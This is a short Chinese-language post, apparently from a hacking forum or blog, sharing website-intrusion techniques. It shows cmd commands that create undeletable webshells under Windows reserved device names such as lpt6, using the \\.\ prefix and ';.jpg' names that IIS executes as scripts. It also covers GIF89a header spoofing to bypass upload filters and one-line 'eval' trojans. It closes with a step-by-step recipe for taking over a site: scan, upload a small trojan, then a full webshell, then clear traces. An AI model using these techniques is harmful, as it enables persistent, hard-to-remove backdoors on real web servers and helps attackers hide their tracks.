最近总被黑。然后。。发现了很多知识值得学习。。分享出来。

畸形文件

 

利用系统保留文件名创建无法删除的webshell2012/11/20 04:14 P.M.Windows 下不能够以下面这些字样来命名文件/文件夹：

aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9 

 但是通过cmd的copy命令即可实现： 

创建时。可试着用引号

 D:\wwwroot>copy rootkit.asp \\.\D:\wwwroot\lpt6.80sec.asp    前面必须有 \\.\ 

删除记得引号。

E:\>del “\\.\E:\lpt4.xj.asp;.jpg”

写入内容

echo      hello>\\.\E:\lpt4.xj.asp;.jpg

显示内容

type \\.\E:\lpt4.xj.asp;.jpg

 

方法。理解。

加\\.\

加..\

加""

特殊BUG渠道

查看可用ren 更名。然后查看内容。

 

eve 方法。执行语句。注意各大上传入口。只要上传这一句。就可以拿下网站。

Gif89a 语句欺骗IIS 解析成图片。

 

黑方法。

1.准备大马。

2.准备扫描。

3.突破口找到，上传一句话木马。

4.头欺骗。绕过上传过滤。制作上传入口。可利用一句话木马创建

5.上传大马。

6.清理痕迹。